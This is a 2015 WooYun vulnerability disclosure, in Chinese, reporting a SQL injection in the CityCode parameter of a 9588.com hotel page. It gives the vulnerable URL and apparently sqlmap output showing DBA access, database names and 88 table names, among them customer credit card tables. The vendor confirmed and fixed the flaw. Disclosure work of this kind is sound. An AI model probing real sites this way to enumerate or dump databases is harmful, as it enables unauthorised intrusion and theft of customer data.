漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0109286
漏洞标题:9588某站注入
相关厂商:9588.com
漏洞作者: XXXQQ
提交时间:2015-04-21 11:20
修复时间:2015-05-20 09:40
公开时间:2015-05-20 09:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-20: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
DBA
详细说明:
http://coope.9588.com/hotel/hotel/brandhtml?CityCode=CGQ&random=10000
参数:CityCode
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'TravelHotel'
current user: 'TravelHotel'
current user is DBA: True
available databases [10]:
[*] ATS
[*] DatabaseManage
[*] master
[*] model
[*] msdb
[*] NFD_TZ
[*] tablebackup
[*] tempdb
[*] TravelFterm
[*] TravelHotel
Database: TravelHotel
[88 tables]
+----------------------------------+
| ACL_Fun |
| ACL_User |
| ACL_UserFun |
| ACL_UserNickName |
| ACL_Usergroup |
| ACL_UsergroupFun |
| ACL_UsergroupUser |
| CRM_Customer |
| CRM_Customer_CreditCard |
| CRM_Customer_WhiteAndBlack |
| CRM_Order |
| CUP_AdvancePaiedPrice_History |
| HO_Balance_Month |
| HO_Base_Agency |
| HO_Base_Agency_Commission |
| HO_Base_Brand |
| HO_Base_City |
| HO_Base_CreditCard |
| HO_Base_District |
| HO_Base_FeaturedAmenity |
| HO_Base_Mark |
| HO_Base_Provider |
| HO_Base_ProviderCity |
| HO_Base_ProviderDistrict |
| HO_Base_Province |
| HO_EnHotel |
| HO_EnHotel_Guarantee |
| HO_EnHotel_Policy |
| HO_EnHotel_RoomPriceType |
| HO_EnHotel_RoomType |
| HO_EnHotel_Traffic |
| HO_Hotel |
| HO_Hotel_AutoUpdateConfirm |
| HO_Hotel_CityPriceRange |
| HO_Hotel_DictionaryData |
| HO_Hotel_Evaluation |
| HO_Hotel_FeaturedAmenity |
| HO_Hotel_Guarantee |
| HO_Hotel_Mark |
| HO_Hotel_MinPrice |
| HO_Hotel_NearHotel |
| HO_Hotel_Photo |
| HO_Hotel_Policy |
| HO_Hotel_ProviderHotel |
| HO_Hotel_ProviderRoomType |
| HO_Hotel_QuestionAnswer |
| HO_Hotel_RoomPrice |
| HO_Hotel_RoomPriceType |
| HO_Hotel_RoomPrice_History |
| HO_Hotel_RoomPrice_History_Month |
| HO_Hotel_RoomStatus |
| HO_Hotel_RoomType |
| HO_Hotel_RoomTypeModel |
| HO_Hotel_ServiceFacilities |
| HO_Hotel_Traffic |
| HO_Order |
| HO_Order_AgencyOrder |
| HO_Order_Audit |
| HO_Order_ProviderOrder |
| HO_Order_Task |
| HO_Provider_AccountTrack |
| HO_Provider_AccountTrackLog |
| SYS_BusinessLog |
| SYS_CUF1 |
| SYS_CUF2 |
| SYS_Dictionary |
| SYS_DistDBRule |
| SYS_DistIISRule |
| SYS_GlobalConfig |
| SYS_IDCreater |
| SYS_Log |
| T_HO_Hotel |
| T_HO_Hotel2 |
| T_LowPrice |
| Temp_Date |
| Temp_Hotel_Jielv |
| Temp_Hotel_JielvInOur |
| VIEW_ACLUser |
| VIEW_ACLUserGroup |
| View_HO_Base_CityACL |
| View_HO_Base_FeaturedAmenityACL |
| View_HO_Order_AuditofACL |
| View_HO_Order_TaskofACL |
| View_HO_OrderofACL |
| View_Ho_Base_DistrictACL |
| sysdiagrams |
| vHO_Hotel_RoomPrice |
| vHotelMinPrice |
+----------------------------------+
没往下走
漏洞证明:
修复方案:
注入
版权声明:转载请注明来源 XXXQQ@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-04-24 14:23
厂商回复:
感谢提醒
最新状态:
2015-05-20:漏动已修复。
2015-05-20:漏动已修复。